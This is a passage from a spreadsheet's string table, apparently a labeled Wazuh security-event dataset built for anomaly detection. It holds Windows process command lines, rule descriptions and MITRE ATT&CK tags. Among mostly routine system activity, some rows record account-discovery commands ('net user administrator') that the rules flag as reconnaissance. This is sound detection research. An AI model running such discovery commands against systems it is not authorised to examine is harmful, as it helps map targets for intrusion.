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bya\Desktop\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{A9B6C06D-E074-4F8A-8AC2-5DC530F7E222}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-110" yWindow="-110" windowWidth="19420" windowHeight="10300" xr2:uid="{9038A4E6-1BA6-4681-941C-D52299E371C8}"/>
  </bookViews>
  <sheets>
    <sheet name="Siemens_WazuhEvent_features" sheetId="1" r:id="rId1"/>
    <sheet name="Score" sheetId="2" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">Siemens_WazuhEvent_features!$A$1:$AA$5315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</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="42251" uniqueCount="6163">
  <si>
    <t>Ref</t>
  </si>
  <si>
    <t>Label</t>
  </si>
  <si>
    <t>timestamp</t>
  </si>
  <si>
    <t>agent.id</t>
  </si>
  <si>
    <t>agent.ip</t>
  </si>
  <si>
    <t>agent.name</t>
  </si>
  <si>
    <t>data.win.system.channel</t>
  </si>
  <si>
    <t>data.win.system.eventID</t>
  </si>
  <si>
    <t>data.win.system.processID</t>
  </si>
  <si>
    <t>data.win.eventdata.threat Name</t>
  </si>
  <si>
    <t>data.win.eventdata.authenticationPackageName</t>
  </si>
  <si>
    <t>data.win.eventdata.logonProcessName</t>
  </si>
  <si>
    <t>data.win.eventdata.ipAddress</t>
  </si>
  <si>
    <t>data.win.eventdata.destinationIp</t>
  </si>
  <si>
    <t>data.win.eventdata.destinationPortName</t>
  </si>
  <si>
    <t>data.win.eventdata.user</t>
  </si>
  <si>
    <t>data.win.eventdata.parentCommandLine</t>
  </si>
  <si>
    <t>data.win.eventdata.commandLine</t>
  </si>
  <si>
    <t>data.win.eventdata.payload</t>
  </si>
  <si>
    <t>rule.level</t>
  </si>
  <si>
    <t>rule.id</t>
  </si>
  <si>
    <t>rule.description</t>
  </si>
  <si>
    <t>rule.mitre.id</t>
  </si>
  <si>
    <t>rule.mitre.tactic</t>
  </si>
  <si>
    <t>rule.mitre.technique</t>
  </si>
  <si>
    <t>Normal</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:13:07.655</t>
  </si>
  <si>
    <t>wazuhVM</t>
  </si>
  <si>
    <t>Listened ports status (netstat) changed (new port opened or closed).</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:13:07.657</t>
  </si>
  <si>
    <t>Wazuh server started.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:13:10.489</t>
  </si>
  <si>
    <t>PAM: Login session opened.</t>
  </si>
  <si>
    <t>[T1078]</t>
  </si>
  <si>
    <t>[Defense Evasion, Persistence, Privilege Escalation, Initial Access]</t>
  </si>
  <si>
    <t>[Valid Accounts]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:13:59.099</t>
  </si>
  <si>
    <t>10.12.25.3</t>
  </si>
  <si>
    <t>Windows11</t>
  </si>
  <si>
    <t>Microsoft-Windows-Sysmon/Operational</t>
  </si>
  <si>
    <t>NT AUTHORITY\\SYSTEM</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"</t>
  </si>
  <si>
    <t>net.exe accounts</t>
  </si>
  <si>
    <t>Discovery activity executed</t>
  </si>
  <si>
    <t>[T1087]</t>
  </si>
  <si>
    <t>[Discovery]</t>
  </si>
  <si>
    <t>[Account Discovery]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:13:59.154</t>
  </si>
  <si>
    <t>Wazuh agent started.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:13:59.789</t>
  </si>
  <si>
    <t>Security</t>
  </si>
  <si>
    <t>A process was created.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:13:59.833</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -secured -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:00.845</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\wevtutil.exe uninstall-manifest \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\Microsoft-Antimalware-AMFilter.man\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:00.887</t>
  </si>
  <si>
    <t>\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:00.920</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:00.987</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\wevtutil.exe install-manifest \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\Microsoft-Antimalware-AMFilter.man\" \"/resourceFilePath:C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\Drivers\\WdFilter.sys\" \"/messageFilePath:C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\Drivers\\WdFilter.sys\" \"/parameterFilePath:C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\Drivers\\WdFilter.sys\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:01.011</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:02.072</t>
  </si>
  <si>
    <t>Negotiate</t>
  </si>
  <si>
    <t>Advapi</t>
  </si>
  <si>
    <t>Windows Logon Success</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:02.114</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\net1 accounts</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:02.139</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\svchost.exe -k wsappx -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:02.181</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:02.212</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\wevtutil.exe uninstall-manifest \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\Microsoft-Windows-Windows Defender.man\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:02.261</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:03.306</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:03.560</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\wevtutil.exe install-manifest \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\Microsoft-Windows-Windows Defender.man\" \"/resourceFilePath:C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\MpEvMsg.dll\" \"/messageFilePath:C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\MpEvMsg.dll\" \"/parameterFilePath:C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\MpEvMsg.dll\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:03.619</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:03.731</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:03.742</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:04.738</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:04.754</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:04.755</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:04.870</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:04.878</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:05.950</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\wevtutil.exe uninstall-manifest \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\Microsoft-Antimalware-Service.man\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:06.031</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:06.071</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\wermgr.exe\" -upload</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:06.072</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:06.126</t>
  </si>
  <si>
    <t>AggregatorHost.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:06.154</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:06.324</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\wevtutil.exe install-manifest \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\Microsoft-Antimalware-Service.man\" \"/resourceFilePath:C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\MpSvc.dll\" \"/messageFilePath:C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\MpSvc.dll\" \"/parameterFilePath:C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\MpSvc.dll\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:06.325</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\wevtutil.exe uninstall-manifest \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\Microsoft-Antimalware-NIS.man\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:06.987</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:07.058</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\wevtutil.exe install-manifest \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\Microsoft-Antimalware-NIS.man\" \"/resourceFilePath:C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\NisSrv.exe\" \"/messageFilePath:C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\NisSrv.exe\" \"/parameterFilePath:C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\NisSrv.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:07.094</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:07.135</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\wevtutil.exe uninstall-manifest \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\Microsoft-Antimalware-RTP.man\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:07.159</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:08.351</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\wevtutil.exe install-manifest \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\Microsoft-Antimalware-RTP.man\" \"/resourceFilePath:C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\MpRtp.dll\" \"/messageFilePath:C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\MpRtp.dll\" \"/parameterFilePath:C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\MpRtp.dll\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:08.369</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:08.383</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\wevtutil.exe uninstall-manifest \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\Microsoft-Antimalware-Protection.man\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:08.404</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:09.582</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:09.607</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:09.619</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:09.626</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\wevtutil.exe install-manifest \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\Microsoft-Antimalware-Protection.man\" \"/resourceFilePath:C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\MpClient.dll\" \"/messageFilePath:C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\MpClient.dll\" \"/parameterFilePath:C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\MpClient.dll\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:09.643</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:10.734</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:10.741</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:10.743</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:10.759</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:10.828</t>
  </si>
  <si>
    <t>Microsoft-Windows-Windows Defender/Operational</t>
  </si>
  <si>
    <t>Windows Defender: Antimalware platform feature configuration changed</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:10.856</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:10.873</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:10.989</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:11.054</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:11.056</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:11.058</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:11.067</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:11.090</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:11.105</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:11.834</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:11.846</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:11.914</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:12.157</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:12.158</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:12.161</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:12.165</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:12.168</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:13.041</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:13.060</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:13.072</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:13.098</t>
  </si>
  <si>
    <t>net user guest</t>
  </si>
  <si>
    <t>A net.exe account discovery command was initiated</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:13.198</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:13.240</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:13.247</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:13.267</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:13.269</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:13.294</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\net1 user guest</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:14.102</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:14.103</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:14.120</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:14.332</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:14.346</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:15.535</t>
  </si>
  <si>
    <t>net user administrator</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:15.543</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:15.671</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:16.806</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\net1 user administrator</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:17.232</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:18.336</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:18.338</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:18.465</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:18.518</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\System32\\sihclient.exe  /cv V4QRUN8jYU+LHMwrUXjrHQ.0.2</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:20.286</t>
  </si>
  <si>
    <t>\"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\MpCmdRun.exe\" -IdleTask -TaskName WdVerification</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:20.502</t>
  </si>
  <si>
    <t>\"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\MpCmdRun.exe\" -IdleTask -TaskName WdCleanup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:20.553</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:20.631</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:21.448</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\sppsvc.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:30.334</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:30.344</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:30.346</t>
  </si>
  <si>
    <t>reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system /v legalnoticetext</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:30.358</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:32.452</t>
  </si>
  <si>
    <t>reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system /v legalnoticecaption</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:32.477</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:33.964</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Credential Validation\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:34.006</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:34.010</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Application Group Management\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:34.038</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:35.195</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Security Group Management\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:35.197</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:35.204</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"User Account Management\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:35.245</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:35.246</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Plug and Play Events\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:35.253</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:35.274</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Process Creation\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:35.288</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Account Lockout\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:35.301</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:35.348</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Group Membership\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:36.300</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Logoff\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:36.302</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:36.330</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Logon\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:36.344</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:36.346</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Other Logon/Logoff Events\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:36.358</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:36.371</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Special Logon\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:36.373</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:36.391</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Detailed File Share\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:36.392</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:37.505</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"File Share\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:37.528</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Other Object Access Events\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:37.530</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:37.538</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Removable Storage\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:37.547</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:38.969</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Audit Policy Change\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:39.016</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:39.017</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Authentication Policy Change\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:39.041</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Authorization Policy Change\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:39.042</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:39.070</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"MPSSVC Rule-Level Policy Change\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:39.071</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:39.079</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Other Policy Change Events\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:39.086</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:39.090</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Sensitive Privilege Use\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:39.101</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:40.129</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"IPsec Driver\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:40.145</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:40.148</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Other System Events\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:40.166</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:40.200</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Security State Change\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:40.224</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:40.243</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"Security System Extension\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:40.262</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:40.369</t>
  </si>
  <si>
    <t>Application</t>
  </si>
  <si>
    <t>Windows application error event.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:40.373</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:41.309</t>
  </si>
  <si>
    <t>auditpol.exe /get /subcategory:\"System Integrity\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:41.322</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:42.375</t>
  </si>
  <si>
    <t>\"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\MpCmdRun.exe\" SignatureUpdate -ScheduleJob -RestrictPrivileges</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:42.392</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:42.417</t>
  </si>
  <si>
    <t>\"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\MpCmdRun.exe\" SignaturesUpdateService -ScheduleJob -UnmanagedUpdate</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:42.446</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:42.447</t>
  </si>
  <si>
    <t>\"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\NisSrv.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:42.480</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:42.485</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:43.436</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:44.211</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:44.242</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\svchost.exe -k osprivacy -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:48.769</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\wevtutil.exe\" uninstall-manifest \"C:\\Program Files\\WindowsApps\\Microsoft.WindowsAppRuntime.1.6_6000.457.2140.0_x86__8wekyb3d8bbwe\\EventLog-Instrumentation.man\" /unicode:true</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:48.827</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:48.880</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\wevtutil.exe\" install-manifest \"C:\\WINDOWS\\SystemApps\\Microsoft.WindowsAppRuntime.vNext.CBS_8wekyb3d8bbwe\\EventLog-Instrumentation.man\" /resourceFilePath:\"C:\\WINDOWS\\SystemApps\\Microsoft.WindowsAppRuntime.vNext.CBS_8wekyb3d8bbwe\\WindowsAppSdk.AppxDeploymentExtensions.Desktop-EventLog-Instrumentation.dll\" /messageFilePath:\"C:\\WINDOWS\\SystemApps\\Microsoft.WindowsAppRuntime.vNext.CBS_8wekyb3d8bbwe\\WindowsAppSdk.AppxDeploymentExtensions.Desktop-EventLog-Instrumentation.dll\" /unicode:true</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:48.904</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:50.146</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\dxgiadaptercache.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:51.862</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\wevtutil.exe\" uninstall-manifest \"C:\\WINDOWS\\SystemApps\\Microsoft.WindowsAppRuntime.vNext.CBS_8wekyb3d8bbwe\\EventLog-Instrumentation.man\" /unicode:true</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:51.910</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:51.988</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\wevtutil.exe\" install-manifest \"C:\\WINDOWS\\SystemApps\\Microsoft.WindowsAppRuntime.CBS_8wekyb3d8bbwe\\EventLog-Instrumentation.man\" /resourceFilePath:\"C:\\WINDOWS\\SystemApps\\Microsoft.WindowsAppRuntime.CBS_8wekyb3d8bbwe\\WindowsAppSdk.AppxDeploymentExtensions.Desktop-EventLog-Instrumentation.dll\" /messageFilePath:\"C:\\WINDOWS\\SystemApps\\Microsoft.WindowsAppRuntime.CBS_8wekyb3d8bbwe\\WindowsAppSdk.AppxDeploymentExtensions.Desktop-EventLog-Instrumentation.dll\" /unicode:true</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:52.000</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\uus\\AMD64\\WaaSMedicAgent.exe 30dc3742b31793f9c87fe20455757c16 V4QRUN8jYU+LHMwrUXjrHQ.0.1.0.3.0</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:52.016</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:14:54.808</t>
  </si>
  <si>
    <t>System</t>
  </si>
  <si>
    <t>Windows System error event</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:08.559</t>
  </si>
  <si>
    <t>Service startup type was changed</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:11.420</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:11.424</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:12.257</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\System32\\svchost.exe -k NetworkService -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:12.304</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:15.608</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:15:18.809</t>
  </si>
  <si>
    <t>Executable dropped in Windows root folder</t>
  </si>
  <si>
    <t>[T1570]</t>
  </si>
  <si>
